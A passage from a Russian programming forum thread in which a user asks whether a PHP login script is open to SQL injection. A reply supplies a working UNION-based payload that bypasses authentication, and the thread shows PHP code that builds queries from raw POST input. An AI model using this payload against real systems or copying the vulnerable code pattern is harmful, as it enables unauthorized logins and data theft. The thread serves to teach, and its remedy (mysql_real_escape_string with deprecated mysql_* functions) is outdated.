Возможна ли инъекция?

@Card1nal · Регистрация: 04.01.2010

Студворк — интернет-сервис помощи студентам

Всем доброго дня
Есть код :

PHP
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
<?php
session_start();
if ( isset($_POST) && (!empty($_POST['login'])) && (!empty($_POST['password'])) ) {
    $sql = "SELECT password FROM auth WHERE login = '".$_POST["login"]."'";
    $req = mysql_query($sql) or die('Erreur SQL');
    if (mysql_num_rows($req) > 0) {
        $data = mysql_fetch_assoc($req);
        if ($_POST["password"] == $data['password']) {
            $_SESSION['logged'] = 1;
            header("location:panel.php");
            die();
        }
    }
}
 
?>

Возможна ли тут sql-инъекция, и, если возможна (в чем я, в принципе, почти уверен) - то какая?

Vovan-VE · 29.01.2011, 17:22

Без проблем. Можно запостить в login такой фрагмент, чтобы в результате получился примерно такой запрос:

SQL
1
SELECT password FROM auth WHERE login = '' AND 0 UNION SELECT 'hacked-password' AS `password` -- '

И тогда результатом будет одна запись:

password

hacked-password

И, как Вы уже догадались, в password постим тот же hacked-password, и всё готово.

Т.е. мы в login постим

Code
1
' AND 0 UNION SELECT 'hacked-password' AS `password` --

Надо всегда использовать mysql_real_escape_string()

PHP
1
$sql = "SELECT password FROM auth WHERE login = '" . mysql_real_escape_string($_POST["login"]) . "'";

Тогда таких проблем не будет.

@Card1nal · 29.01.2011, 20:38 **[ТС]**

Спасибо большое!

Добавлено через 1 час 15 минут
А вот при таком раскладе что можно сделать, подскажите пожалуйста

PHP
1
2
3
4
5
6
7
8
9
10
11
if ( isset($_POST) && (!empty($_POST['login'])) && (!empty($_POST['password'])) ) {
    extract($_POST);
    $sql = "SELECT pseudo, sexe, ville, mdp FROM auth WHERE pseudo = '".addslashes($login)."'";
    $req = mysql_query($sql) or die('Erreur SQL');
    if (mysql_num_rows($req) > 0) {
        $data = mysql_fetch_assoc($req);
        if ($password == $data['mdp']) {
            $loginOK = true;
        }
    }
}

спасибо заранее

Vovan-VE · 30.01.2011, 06:09

Сообщение от Card1nal

А вот при таком раскладе что можно сделать, подскажите пожалуйста

Теперь можно послать какие-нибудь символы, например символы новой строки \r и/или \n, которые просто приведут к синтаксической ошибке. mysql_real_escape_string() всегда выдает правильную строку, где все нужные символы безопасно заэкранированы.

__PION__ · 30.01.2011, 18:26

Vovan-VE, а разве можно при выводе из БД делать инъекцию? Ничего в БД мы же не вводим при этом, т.е содержание БД не нарушается. А в случае INSERT и UPDATE, согласен - ф-я mysql_real_escape_string() нужна.

Просто логику инъекции при выводе не понимаю, как такое может быть?

Vovan-VE · 31.01.2011, 15:02

Love_and_Peace, Первый пример с проверкой логина-пароля - хороший пример номер раз. Можно без проблем авторизоваться под кем угодно.

Другой пример: с помощью подзапросов в SELECT теоритически можно любой SELECT из любой таблицы выполнить и получить любую информацию (в зависимости от ситуации).

Новые блоги и статьи Все статьи Все блоги /
http://iceja.net/ математические сервисы iceja 20.01.2026 Обновила свой сайт http:/ / iceja. net/ , приделала Fast Fourier Transform экстраполяцию сигналов. Однако предсказывает далеко не каждый сигнал (см ограничения http:/ / iceja. net/ fourier/ docs ). Также. . .	http://iceja.net/ сервер решения полиномов iceja 18.01.2026 Выкатила http:/ / iceja. net/ сервер решения полиномов (находит действительные корни полиномов методом Штурма). На сайте документация по API, но скажу прямо VPS слабенький и 200 000 полиномов. . .	Расчёт переходных процессов в цепи постоянного тока igorrr37 16.01.2026 / * Дана цепь постоянного тока с R, L, C, k(ключ), U, E, J. Программа составляет систему уравнений по 1 и 2 законам Кирхгофа, решает её и находит переходные токи и напряжения на элементах схемы. . . .	Восстановить юзерскрипты Greasemonkey из бэкапа браузера damix 15.01.2026 Если восстановить из бэкапа профиль Firefox после переустановки винды, то список юзерскриптов в Greasemonkey будет пустым. Но восстановить их можно так. Для этого понадобится консольная утилита. . .
Сукцессия микоризы: основная теория в виде двух уравнений. anaschu 11.01.2026 https:/ / rutube. ru/ video/ 7a537f578d808e67a3c6fd818a44a5c4/	WordPad для Windows 11 Jel 10.01.2026 WordPad для Windows 11 — это приложение, которое восстанавливает классический текстовый редактор WordPad в операционной системе Windows 11. После того как Microsoft исключила WordPad из. . .	Classic Notepad for Windows 11 Jel 10.01.2026 Old Classic Notepad for Windows 11 Приложение для Windows 11, позволяющее пользователям вернуть классическую версию текстового редактора «Блокнот» из Windows 10. Программа предоставляет более. . .	Почему дизайн решает? Neotwalker 09.01.2026 В современном мире, где конкуренция за внимание потребителя достигла пика, дизайн становится мощным инструментом для успеха бренда. Это не просто красивый внешний вид продукта или сайта — это. . .

__PION__ 960 / 801 / 85 Регистрация: 21.07.2010 Сообщений: 3,522
	30.01.2011, 18:26
	Vovan-VE, а разве можно при выводе из БД делать инъекцию? Ничего в БД мы же не вводим при этом, т.е содержание БД не нарушается. А в случае INSERT и UPDATE, согласен - ф-я mysql_real_escape_string() нужна. Просто логику инъекции при выводе не понимаю, как такое может быть? 0

Vovan-VE 13210 / 6599 / 1041 Регистрация: 10.01.2008 Сообщений: 15,069
	31.01.2011, 15:02
	Love_and_Peace, Первый пример с проверкой логина-пароля - хороший пример номер раз. Можно без проблем авторизоваться под кем угодно. Другой пример: с помощью подзапросов в SELECT теоритически можно любой SELECT из любой таблицы выполнить и получить любую информацию (в зависимости от ситуации). 1